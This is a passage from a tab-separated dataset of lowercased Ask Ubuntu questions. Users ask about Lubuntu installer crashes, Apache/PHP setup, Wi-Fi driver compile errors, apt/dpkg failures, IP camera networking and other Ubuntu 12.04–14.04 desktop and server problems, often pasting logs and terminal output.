- 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm )
511256	installing lubuntu 14.04.1 fails , upowerd appears to hang	on the live-cd session , i tried installing lubuntu double clicking on the install button on the desktop . here , the cd starts running but then stops running and nothing happens . next , i rebooted and tried installing lubuntu directly from the boot menu screen using forcepae again . after a while , i receive the following error message : the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . hitting enter brings me to the desktop . for what errors should i search ? and how ? thanks for some hints ! on lubuntu 12.04 : uname -a linux humboldt 3.2.0-67-generic # 101-ubuntu smp tue jul 15 17:45:51 utc 2014 i686 i686 i386 gnu/linux lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.5 lts release : 12.04 codename : precise upowerd appears to hang : aug 25 10:53:28 lubuntu kernel : [ 367.920272 ] info : task upowerd:3002 blocked for more than 120 seconds . aug 25 10:53:28 lubuntu kernel : [ 367.920288 ] tainted : g s c 3.13.0-32-generic # 57-ubuntu aug 25 10:53:28 lubuntu kernel : [ 367.920294 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . aug 25 10:53:28 lubuntu kernel : [ 367.920300 ] upowerd d e21f9da0 0 3002 1 0x00000000 aug 25 10:53:28 lubuntu kernel : [ 367.920314 ] e21f9dfc 00000086 f5ef7094 e21f9da0 c1050272 c1a8d540 c1920a00 00000000 aug 25 10:53:28 lubuntu kernel : [ 367.920333 ] c1a8d540 c1920a00 d9e44da0 f5ef6540 c1129061 00000002 000001c1 0001c37b aug 25 10:53:28 lubuntu kernel : [ 367.920351 ] 00000000 00000002 00000000 e2276240 00000000 00000040 c12b0ec5 c19975a8 aug 25 10:53:28 lubuntu kernel : [ 367.920368 ] call trace : aug 25 10:53:28 lubuntu kernel : [ 367.920389 ] [ < c1050272 > ] ? kmap_atomic_prot+0x42/0x100 aug 25 10:53:28 lubuntu kernel : [ 367.920404 ] [ < c1129061 > ] ? get_page_from_freelist+0x2a1/0x600 aug 25 10:53:28 lubuntu kernel : [ 367.920417 ] [ < c12b0ec5 > ] ? process_measurement+0x65/0x240 aug 25 10:53:28 lubuntu kernel : [ 367.920432 ] [ < c1654c73 > ] schedule_preempt_disabled+0x23/0x60 aug 25 10:53:28 lubuntu kernel : [ 367.920443 ] [ < c16565bd > ] __mutex_lock_slowpath+0x10d/0x171 aug 25 10:53:28 lubuntu kernel : [ 367.920454 ] [ < c1655aec > ] mutex_lock+0x1c/0x28 aug 25 10:53:28 lubuntu kernel : [ 367.920478 ] [ < f857223a > ] acpi_smbus_transaction+0x48/0x210 [ sbshc ] aug 25 10:53:28 lubuntu kernel : [ 367.920489 ] [ < c11858e1 > ] ? do_last+0x1b1/0xf60 aug 25 10:53:28 lubuntu kernel : [ 367.920504 ] [ < f857242f > ] acpi_smbus_read+0x2d/0x33 [ sbshc ] aug 25 10:53:28 lubuntu kernel : [ 367.920520 ] [ < f881e0f1 > ] acpi_battery_get_state+0x74/0x8b [ sbs ] aug 25 10:53:28 lubuntu kernel : [ 367.920535 ] [ < f881e8a9 > ] acpi_sbs_battery_get_property+0x2a/0x233 [ sbs ] aug 25 10:53:28 lubuntu kernel : [ 367.920549 ] [ < c14fa61f > ] power_supply_show_property+0x3f/0x240 aug 25 10:53:28 lubuntu kernel : [ 367.920561 ] [ < c114664f > ] ? handle_mm_fault+0x64f/0x8d0 aug 25 10:53:28 lubuntu kernel : [ 367.920573 ] [ < c14fa5e0 > ] ? power_supply_store_property+0x60/0x60 aug 25 10:53:28 lubuntu kernel : [ 367.920586 ] [ < c1407d20 > ] ? dev_uevent_name+0x30/0x30 aug 25 10:53:28 lubuntu kernel : [ 367.920597 ] [ < c1407d38 > ] dev_attr_show+0x18/0x40 aug 25 10:53:28 lubuntu kernel : [ 367.920608 ] [ < c11dad15 > ] sysfs_seq_show+0xe5/0x1c0 aug 25 10:53:28 lubuntu kernel : [ 367.920621 ] [ < c119846e > ] seq_read+0xce/0x370 aug 25 10:53:28 lubuntu kernel : [ 367.920633 ] [ < c11983a0 > ] ? seq_hlist_next_percpu+0x90/0x90 aug 25 10:53:28 lubuntu kernel : [ 367.920644 ] [ < c1179238 > ] vfs_read+0x78/0x140 aug 25 10:53:28 lubuntu kernel : [ 367.920654 ] [ < c11799a9 > ] sys_read+0x49/0x90 aug 25 10:53:28 lubuntu kernel : [ 367.920667 ] [ < c165efcd > ] sysenter_do_call+0x12/0x28 /var/log/installer/debug shows upower related error : ubiquity 2.18.8 gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` overlay-scrollbar '' error : dbus.proxies : introspect error on :1.23 : /org/freedesktop/upower : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . exception in gtk frontend ( invoking crash handler ) : traceback ( most recent call last ) : file `` /usr/lib/ubiquity/bin/ubiquity '' , line 636 , in < module > main ( oem_config ) file `` /usr/lib/ubiquity/bin/ubiquity '' , line 622 , in main install ( query=options.query ) file `` /usr/lib/ubiquity/bin/ubiquity '' , line 260 , in install wizard = ui.wizard ( distro ) file `` /usr/lib/ubiquity/ubiquity/frontend/gtk_ui.py '' , line 290 , in __init__ mod.ui = mod.ui_class ( mod.controller ) file `` /usr/lib/ubiquity/plugins/ubi-prepare.py '' , line 93 , in __init__ upower.setup_power_watch ( self.prepare_power_source ) file `` /usr/lib/ubiquity/ubiquity/upower.py '' , line 21 , in setup_power_watch power_state_changed ( ) file `` /usr/lib/ubiquity/ubiquity/upower.py '' , line 18 , in power_state_changed not misc.get_prop ( upower , upower_path , 'onbattery ' ) ) file `` /usr/lib/ubiquity/ubiquity/misc.py '' , line 809 , in get_prop return obj.get ( iface , prop , dbus_interface=dbus.properties_iface ) file `` /usr/lib/python3/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python3/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python3/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout )
511258	ca n't execute php page on ubuntu 14.04	i just installed appserv like this sudo apt-get install apache2 php5 libapache2-mod-php5 mysql-server phpmyadmin everything seems to be cool but when saved my php page under /var/www and then typed localhost/test.php not found the requested url /test.php was not found on this server . i typed sudo /etc/init.d/apache2 restart i see this restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message i believe it had nothing with it because when i type localhost in my browser i can see the apache2 ubuntu default page .
511259	error : after flashing the new image	i got the source code downloaded using below command phablet-dev-bootstrap -- sources aosp -- repo-branch phablet-4.4.2_r1 -c ./ < my-dir > i 've gotten the kernel and device folder synced , and build is also done successfully . in out/target/product/ ... . boot.img , and system.img and certain other binaries are generated . i could not find ubuntu touch rootfs . q1 . do i need to download utopic-preinstalled-touch-armhf.tar.gz from ubuntu server every time for any device ? q2 . could n't i build my own ubuntu touch rootfs for my device from the source downloaded using phablet-dev-bootstrap ? my device does not boot when i follow the procedure given on https : //wiki.ubuntu.com/touch/deploying i followed below steps given on the link fallocate -l 2g system.img mke2fs -f system.img mkdir system mount -o loop system.img system cd system zcat utopic-preinstalled-touch-armhf.tar.gz | tar xf - cp path/to/androidtree/out/target/product/ $ device/system.img system/var/lib/lxc/android/ flashed boot.img adb push system.img /data after doing these steps , i reboot my device and it gives error while i am able to use adb . error logs begin : loading essential drivers ... done . begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . begin : running /scripts/local-premount ... done . initrd : using loop-mounted flipped mode mkdir : ca n't create directory '/root/userdata ' : read-only file system mkdir : ca n't create directory '/root/userdata/android-data ' : no such file or directory cp : ca n't create directory '/root/userdata/system-data//var/lib/urfkill ' : no such file or directory cat : ca n't open '/root/android/system/boot/android-ramdisk.img ' : no such file or directory init : ureadahead-touch main process ( 1628 ) terminated with status 5 few more information : i get the prompt as roor @ ubuntu-phablet on # adb shell and also , looks like system.img is mounted as root / my /data is mounted to partition mmcxxx please give me some pointers to further debug the issues .
511260	every time i run the make command to install my wifi driver i get these errors . any help please ?	make -c /lib/modules/3.8.0-19-generic/build m=/home/joe/wi-fi/rt2x00 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/joe/wi-fi/rt2x00/rt2x00config.o /home/joe/wi-fi/rt2x00/rt2x00config.c : in function ‘rt2x00ht_center_channel’ : /home/joe/wi-fi/rt2x00/rt2x00config.c:187:38 : error : ‘struct ieee80211_conf’ has no member named ‘chandef’ /home/joe/wi-fi/rt2x00/rt2x00config.c:202:13 : error : ‘struct ieee80211_conf’ has no member named ‘chandef’ /home/joe/wi-fi/rt2x00/rt2x00config.c : in function ‘rt2x00lib_config’ : /home/joe/wi-fi/rt2x00/rt2x00config.c:230:19 : error : ‘struct ieee80211_conf’ has no member named ‘chandef’ /home/joe/wi-fi/rt2x00/rt2x00config.c:284:29 : error : ‘struct ieee80211_conf’ has no member named ‘chandef’ /home/joe/wi-fi/rt2x00/rt2x00config.c:285:29 : error : ‘struct ieee80211_conf’ has no member named ‘chandef’ /home/joe/wi-fi/rt2x00/rt2x00config.c : in function ‘rt2x00ht_center_channel’ : /home/joe/wi-fi/rt2x00/rt2x00config.c:203:1 : warning : control reaches end of non-void function [ -wreturn-type ] make [ 2 ] : *** [ /home/joe/wi-fi/rt2x00/rt2x00config.o ] error 1 make [ 1 ] : *** [ _module_/home/joe/wi-fi/rt2x00 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ all ] error 2
511262	web-server on azure	i installed an ubuntu server 14.04 lts virtual machine on azure . i want to set it up as a webserver with email capabilities , too . how can i install software packages through the command line ? is there a list of available packages ? thanks , yiannis
511263	using `sudo apt-get update`	when should this command ( sudo apt-get update ) exactly be used in ubuntu ? what time or when should i use this command ?
511264	ubuntu trusty - corresponding debian release ? wheezy or squeeze ?	i want to install dotdeb on ubuntu trusty , release 14.04 and i was wondering which version of the available packages for debian i should choose . wheezy or squeeze ?
511269	how to make a program default for a certain file ?	so i am working on this software revkit and its gui pops up on executing a .py file from terminal i.e . it has n't exactly got a launch button and also the software does n't get installed as a proper application ( it gets unzipped into a folder in my download directory which has the executable .py file for launching the gui ) . the problem is that if i save my work i am not able to open it with revkit the next time as it is n't mentioned in the open with application list . what should i do ? installation process for revkit is given on their site : http : //www.revkit.org/
511270	chrome notifications indicator not showing	chrome notifications indicator not showing . package libappindicator1 is installed . i remember having notifications in the past , i have n't paid much attention to it , so i might have disabled it ( via gui only ) , but i ca n't remember . but now , i need them . is it possible to enable notifications ?
511272	php script might be prevented form uploading file because of permissions	i recently had issues with a php upload script that refused to move uploaded files to a permanent directory . after numerous alterations and debugging attempts to the script ( that previously worked on another machine ) , i checked php 's settings in /etc/php5/apache2/php.ini . and noted everything in there wouldnât prevent the upload . i then turned to where temporary files are stored ( /tmp ) and found that a tmp file is created when uploading . could the script be prevented from moving the file to a location ( not one declared default installation of apache ) due to permissions requirements ? i checked what user apache is using posix_getpwuid ( ) and it returned : array ( [ name ] = > www-data [ passwd ] = > x [ uid ] = > 33 [ gid ] = > 33 [ gecos ] = > www-data [ dir ] = > /var/www [ shell ] = > /usr/sbin/nologin ) the directory of the site using the script is /home/smillification/workspace/website and it 's permission is set to me / ( smillification ) . both the upload script and final file location that the script moves the uploaded file to is located under the above mentioned directory . i am new to ubuntu and it file permissions so any help would be greatly appreciated .
511273	my software centre does n't download anything `` failed to download repository information ''	whenever i try to get anything from the software centre it just says `` failed to download repository information . check your internet connection '' i 've tried many different things but nothing will work and nothing downloads # i tried to post details but i cant have more than one link
511277	how to play 0ad multiplayer in ubuntu 14.04	i have installed latest version of ubuntu 14.04 . i want to play multipalyer game with my friend and we are using local area network of our college . we have no problem with single player . so any one with great ideas that can help us ! ! ! ! ! ! please share
511278	print screen / screen capture will not capture the current view	when i want to print screen or capture the screen using shutter , the result is not the expected . if i have visited a webpage for instance , logged in and wanted to capture a part of the page i am browsing , the captured image shows the first page i visited instead . trying to open another program and capturing whatever shows on screen gives the same result . even now as i am writing this , trying to capture this page , gives the same result . i have even closed the tab containing the page that shows in the captured image ! i am running ubuntu 12.04 desktop . this , as i can recall , was prevalent in 11.10 for me as well . i installed shutter recently to test if it would solve the problem , obviously without success .
511279	how to disable or change automatic session locking in ubuntu 14.04 ?	i installed ubuntu 14.04 on my toshiba c55 satellite . i 'm a total newbie to linux . my laptop screen goes blank after 10 minutes and i have to move mouse and log in again using my username . can this be stopped ? i know it does this because i have n't used the system for 10 minutes but there must be somewhere in settings to change this !
511282	how to manage the icons in the top bar ( 14.04 & metacity )	i 've installed virtualbox and this icon appeared in the desktop top bar . i now how to add icons with drag & drop but how to remove one ? when trying to drap & drop it in the destop trash icon , i have a popup saying that i do n't have the permission to put it in the trash .
511287	dvdstyler `` vbv buffer size is needed '' error	after taking the time to compile dvdstyler v2.7.2 & getting it work on my lubuntu 14.04 64bit i get this unusual error whenever i try to make a dvd . the dvdstyler interface tells me generating menus generating menu 1 of 1 create menu mpeg could not open video codec error creation of menu whilst the terminal which i originally ran dvdstyler from tells me output # 0 , mpeg2video , to '/tmp/dvd-tmp/menu0-0.mpg_bg.m2v ' : stream # 0.0 : video : mpeg2video , yuv420p , 720x576 , q=2-31 , 6000 kb/s , 90k tbn , 25 > tbc ( lyrics ) [ mpeg2video @ 0x279de00 ] a vbv buffer size is needed , for encoding with a maximum bitrate i 've tried all the fiddling with settings , like the video bit rate , audio format & making an iso instead of burning directly to disc . i was just wondering if anyone else has come across something like this & if you know how to add this `` vbv buffer size '' that its asking about .
511288	setting up a windows 7 virtual machine on ubuntu 14.04	i have my original windows 7 professional installation disks `` for distribution only with a new hp or compaq pc '' and would like to create a windows vm on my ubuntu 14.04 installation . i 've looked at virtualbox , but i could n't get it to work as it wanted an iso disk , not my original disks . does anyone have any suggestions ? thanks : )
511292	usb doesnot recogniced in precise on dual boot pc	i have ubuntu 12.04 along with win7 , and connect to internet via usb ( huawei fwt cdma ) modem , my issue is that , after switching on pc if i boot via win7 , the modem and and all usb devices ( pen-drive , bluetooth dongle , etc.. ) working properly than `` restart '' pc and boot via ubuntu also recognize usb devices and working smooth.but if i try to boot via ubuntu first , after switching on , it does n't recognize usb devices . so i ca n't boot ubuntu first and connect to internet too . i can access internet in ubuntu only after win7 boot . so what can i do ? help me .
511296	no option to install ubuntu 14.04.1 alongside windows 7	i previously had 12.04 installed via wubi and have now uninstalled in order to properly partition and dual-boot . however , booting from livecd ( usb ) brings about a black screen after the original ubuntu boot screen ( this can be fixed by issuing a 'nomodeset ' parameter ) . when in a live session , running ubiquity reports that there are no other os 's on the ssd . running os-prober confirms this , however tacking on winosdata=true allows it to find my w7 installation . i tried clicking 'something else ' and partitioning through there , but this then makes the pc boot straight into ubuntu and without nomodeset , i ca n't see a thing . ideally i just want a small ubuntu partition alongside windows 7 as i use it to ssh -x into work . any ideas ?
511297	how to connect a button to filedialog function in ubuntu sdk ?	i 've just started to deploy my first application for ubuntu using qtcreator 3.1.1 based on qt5.2.1 on ubuntu 14.10.. i need to open some video files , so i 'm going to put a button to choose file obviously . also i know i can use this function to open files : filedialog { id : filedialog title : `` please choose a file '' onaccepted : { console.log ( `` you chose : `` + filedialog.fileurls ) qt.quit ( ) } onrejected : { console.log ( `` canceled '' ) qt.quit ( ) } component.oncompleted : visible = true } here 's my question : how can i connect them to each other ? i want the fieldialog to be opened when i click on the button . and is that the only way to do this ? i mean could n't i do the same process in c++ code ? and is this the right place to ask similar questions ? or i have to bring it up in stackoverflow ?
511300	do n't remember pgp passphrase until end of session	to use my pgp key i always have to enter my passphrase . but as it happens , i have to unlock the key only once for every session . the desired behaviour would be , that i have to unlock the key each time i want to use it so the passphrase is not remembered for the whole session . the dialog for entering the passphrase provides a checkbox `` automatically unlock this key , whenever i 'm logged in '' but that is also not what i want . i recall this dialog in older versions of ubuntu providing more options , like this : but these options are never provided to me . so how can i configure seahorse/gpg/ubuntu to always locking the key after usage ?
511301	what are the pros and cons of an encrypted ubuntu installation ?	i am awaiting the delivery of a new laptop that has no os on it . i am going to install 14.04lts and i am wondering what are the pros and cons of an encrypted ubuntu installation ? i assume pros are to do with security but i would appreciate finding out how much different it is from an un-encrypted install . cons i was thinking would it affect the computers performance level but interested would this be noticeable in everyday use . computer you mostly be used for browsing , some downloading , latex , and a little gaming ( steam ) . some basic spec on my computer are , intel haswell i3 2.6ghz chip , 4gb ram , 120gb msata ssd ( also have a 1tb hdd that i 'll use for data ) .
511303	32bit or 64bit version of ubuntu	i 've been using ubuntu for about a year now , and have recently got a 2nd hand laptop , the specs are as follows dual core 1.46gb intel pentium dual cpu t2310 ( 64bit ) , 1.99 gb ram , and a 160gb hdd just now i have the 32bit version of ubuntu installed , but with the release of utopic unicorn coming in a couple of months , i 'm wondering if there would be any benefit to installing the 64bit version of that when it 's time . thanks stuart
511304	what editor provides highlighted and clickable hyperlinks ? ( similar to notepad++ )	i have about a 1000 links in my txt file and i do n't want to copy paste them in my browser . so i am looking for a text editor that highlights urls and makes them clickable.please note that i am looking for a text editor ( like kate , sublime ) and not a full ide . i have tried sublime , kate , gedit etc , but i ca n't figure how to highlight urls and hyperlinks there
511305	ubuntu 13.1 apt-get installs fails with every install/remove command inux-image-3.11.0-26-generic	including sudo apt-get -- purge autoremove etc and after trying sudo apt-get clean , autoclean , dpkg reconfigure etc i 've been around this problem for days , read everything i could find there , or other ubuntu forums but failed to solve this - so i ca n't install needed packages . or remove , or upgrade.. etc . really stuck . i would note that this is an amazon instance , so i do n't have physical access to the machine . please , help me to solve this problem.. here 's the output of any sudo apt-get install command server_ubuntu @ ip-172-31-31-94 : ~/scripts $ sudo apt-get install nodejs reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.11.0-26-generic linux-image-extra-3.11.0-26-generic the following packages will be upgraded : nodejs 1 upgraded , 0 newly installed , 2 to remove and 51 not upgraded . 4 not fully installed or removed . need to get 0 b/5,701 kb of archives . after this operation , 184 mb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : warning : files list file for package 'libxcomposite-dev ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'python-dev ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'erlang-parsetools ' missing ; assuming package has no files currently installed ... many more lines like this.. dpkg : warning : files list file for package 'python-pkg-resources ' missing ; assuming package has no files currently installed ( reading database ... 57307 files and directories currently installed . ) removing linux-image-extra-3.11.0-26-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic update-initramfs : deleting /boot/initrd.img-3.11.0-26-generic run-parts : executing /etc/kernel/postrm.d/x-grub-legacy-ec2 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.11.0-15-generic found kernel : /boot/memtest86+.bin run-parts : /etc/kernel/postrm.d/x-grub-legacy-ec2 exited with return code 10 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-26-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-26-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-26-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic update-initramfs : deleting /boot/initrd.img-3.11.0-26-generic run-parts : executing /etc/kernel/postrm.d/x-grub-legacy-ec2 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.11.0-15-generic found kernel : /boot/memtest86+.bin run-parts : /etc/kernel/postrm.d/x-grub-legacy-ec2 exited with return code 10 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-26-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-26-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-26-generic linux-image-3.11.0-26-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
511306	problem with wi-fi . broadcom corporation bcm4313 802.11bgn wireless , ubuntu 14.04	i have a problem with wifi connection on my laptop with ubuntu 14.04 . i have now two routers and two different wifi connections in my house . one of them is perfectly working on everything ( 2 pc 's on windows , 2 notebooks on ubuntu 14.04 , and smartphones ) . its established on tp link td w8968 . the other new wifi connection also works on both pc 's on windows and also on every smartphone and i didnt have to do anything to make it work . unfortunatelly it 's not working on both notebooks . can it be a problem with wireless lan controler ? both notebooks have broadcom corporation bcm4313 802.11bgn wireless . this not working wifi is established on tp link tl -wr1042nd
511307	is my hp deskjest 1512 all-in-one printer compatible with ubuntu 14.04 ? how do i install it if it is ?	i was given an hp deskjet 1512 all-in-one printer as a graduation gift . i have also recently installed ubuntu 14.04 lts on my hp probook 4510s with a 32-bit 1gb ram and a celeron processor . i am still adjusting to the change from windows vista . is the printer compatible and if so how can i install it ?
511308	when a modal window opens , and there is a full screen window on the back , this full screen window gets in the front	i am using ubuntu 14.04 , with metacity , but the same bug was happening also using cinnamon . basically i have a bash terminal in full screen mode . if i use an other program , and this program opens a modal window , this modal window does not get the focus , but looses priority and the full screen terminal window appears in the front , making me use alt-tab to get again focus on modal window and the program i was using . this happens only if there is a full screen window active in the back . how to avoid it ?
511309	not able to install anything in ubuntu 12.04 software center	as displayed in below image , i am having trouble in installing any software in ubuntu 12.04 software center . i am not able to cancel the 1st process ( `` searching '' ) , though i have many times clicked to cancel it . and because of that process , i am not able to install any other packages . if i try to install anything from the terminal i get e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how can i get rid of this situation ? ?
511315	assign ctrl+shift to caps lock	i was wondering if i could assign ctrl+shift to the caps-lock key . so when i type caps-lock+right it should mark a complete word e.g . i already looked at this question but since i do n't run any functions or commands the provided answer does n't really help me . hope anybody knows how to do this .
511316	is it possible to install packages from iso ?	i browsed through the iso file for ubuntu_14.04_lts , i found that majority of data were contained in a single file : casper/filesystem.squashfs ( 922 mb ) . there is no *.deb files under dists/trusty/main/binary-amd64/ . the size of the entire directory is just 10k . how can we extract packages from the ubuntu iso ?
511318	hdd shutting down ?	i 've got an ssd where ubuntu ( the newest , fully updated , 64bit ) is installed . additionally i 've got an hdd where i store some things e.g . steam games or images for virtualbox . if i start steam or virtualbox it does n't find the games/images which are stored on the hdd . if i open the hdd with nautilus before starting these programs steam/virtual box work like they should . i think the hdd wents into sleep mode or something like that if i do n't use it and steam/virtualbox ca n't wake it up . i went to the drive options of the hdd and disabled that he goes to sleep mode ( or however it is called in english ) . the problem remains . how could i solve this problem ?
511319	is all the software from ubuntu software center working on ubuntu 14.04 64bit ?	i want to install the 64bit version of ubuntu 14.04 on my new laptop which you can find here if you want to check its stats . my question is : are there programs in software center which do not work on the 64bit version ? ( i know this question is a duplicate but the similar questions i found are about 2 or 3 years old )
511321	only a different subnet and a virtual ip for it seems to work out to access my ip-cam	my router ip is 192.168.1.1 . dhcp-range from 192.168.1.33 to .64 . my ip-cam ( hikvision ) is set to ip 192.168.1.100 . funny enough i can access the ip-cam only if it is on its factory default ( 192.0.0.64 ) i.e . in another subnet and if i set up a virtual ip of 192.0.0.128 for reaching that subnet over my browser . sudo ifconfig eth0:0 192.0.0.128 i can access my ip-cam over firefox . but if i change its ip on 192.168.1.100 i ca n't access it anymore and ubuntu then yields very inconsistent nmaps in the console : nuc @ nuc : ~ $ nmap 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 14:41 cest note : host seems down . if it is really up , but blocking our ping probes , try -pn nmap done : 1 ip address ( 0 hosts up ) scanned in 3.04 seconds nuc @ nuc : ~ $ nmap 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 14:42 cest nmap scan report for 192.168.1.100 host is up ( 0.47s latency ) . not shown : 991 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet 80/tcp open http 443/tcp open https 554/tcp open rtsp 7001/tcp open afs3-callback 8000/tcp open http-alt 8200/tcp open trivnet1 49152/tcp open unknown nmap done : 1 ip address ( 1 host up ) scanned in 17.97 seconds nuc @ nuc : ~ $ nmap 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 14:42 cest nmap scan report for 192.168.1.100 host is up ( 0.00090s latency ) . not shown : 998 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet nmap done : 1 ip address ( 1 host up ) scanned in 15.42 seconds nuc @ nuc : ~ $ nmap 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 14:42 cest nmap scan report for 192.168.1.100 host is up ( 0.0010s latency ) . not shown : 995 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet 7001/tcp open afs3-callback 8000/tcp open http-alt 8200/tcp open trivnet1 nmap done : 1 ip address ( 1 host up ) scanned in 53.83 seconds nuc @ nuc : ~ $ nmap 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 14:43 cest nmap scan report for 192.168.1.100 host is up ( 0.00096s latency ) . not shown : 998 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet nmap done : 1 ip address ( 1 host up ) scanned in 15.41 seconds nuc @ nuc : ~ $ does ubuntu thread virtual ips different ? this is quite hilarious as i ca n't access the cam if it 's in the same subnet and it should n't be on 192.0.0.64 for safety reasons . but otherwise it does n't seem to work . is this caused by ubuntu , my ipcam or my router ? edit : the usual ping 192.168.1.100 in terminal seems to work . there some router screenshots : when the cam i in the same subnet and when i hit a lucky second ( see nmap above ) i receive sometimes following screen after putting in my admin/pwd , most of the time i hit a blank browser/firefox error though : edit 2 : the ping is actually producing different results on repetition . the first time : emp @ thinkpad : ~ $ ping 192.168.1.100 ping 192.168.1.100 ( 192.168.1.100 ) 56 ( 84 ) bytes of data . from 192.168.1.40 icmp_seq=1 destination host unreachable [ ... ] from 192.168.1.40 icmp_seq=23 destination host unreachable 64 bytes from 192.168.1.40 : icmp_seq=24 ttl=64 time=1136 ms 64 bytes from 192.168.1.40 : icmp_seq=25 ttl=64 time=136 ms [ ... ] the second time : emp @ thinkpad : ~ $ ping 192.168.1.100 ping 192.168.1.100 ( 192.168.1.100 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.100 : icmp_seq=1 ttl=64 time=6.04 ms [ ... ] why does ubuntu act like that ? here are 2 more images ( i 've set the ip-cam to 192.168.1.199 now and ping it in the left terminal window ) . the right terminal window shows tracebacks ( sudo tcpdump -i eth0 -v icmp ) here : and nmap here :
511322	network issues in 14.04	so i recently downloaded ubuntu and every 30 minutes or so i end up having my connection drop . is this some kind of driver issue or do i need to mess with my settings.this is my network card from the terminal . lspci | grep -i net 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter ( rev 01 )
511324	cron job from mysql and send an email with results	i have a ubuntu box hosted and need to setup a cron job for executing a stored procedure and sending the results via email to one address once a week . how can i do this ? i am using mailgun
511327	what type of u14.04 do i have ?	where do i find what desktop version of u14.04 i have ? i read where there is a gnome , trusty tar , etc ! ! - tks david ps i wish the `` shrink , enlarge & close '' buttons on apps & boxes was bigger ! ! hard to hit the mouse at the right spot ! !
511329	steam is having trouble connecting to steam servers	i am unable to log into my steam account because i get the following message : '' steam is having trouble connecting to steam servers '' there is no problem with my internet connection and i tried installing my anti-virus to see if there was a clash . but it made no difference . i have tried reinstalling steam and it made no difference . i also tried resetting my steam in the launcher and i still get the same error . i have tried to delete my app cache , but the launcher can not find it . i could connect to my account on windows . i have yet to be able to connect to my steam on ubuntu . please help ! !
511335	how do i change the unity launcher dash home icon in ubuntu 12.04 ?	okey , before anyone rates this as duplicate of anything ! i have researched . and i am sorry if my response for my previous questions was bad , i did not mean to do so , some personal things happened , i 'm sorry . okey , i was looking for ways to make ubuntu look like mac and i have done this before . i used this link to change the unity launcher dash icon to the apple icon . i know that this is for ubuntu 14.04 and i have 12.04 but i 've done this before ! i changed the icon to the apple logo and back the the beloved ubuntu logo . but for some reason this is not doing it again ! whenever i enter : sudo mv launcher_bfb.png /usr/share/unity/icons/ i get : mv : can not stat `launcher_bfb.png ' : no such file or directory how do i fix this ? thank you guys soo much for responding even though i have not responded properly in the past : )
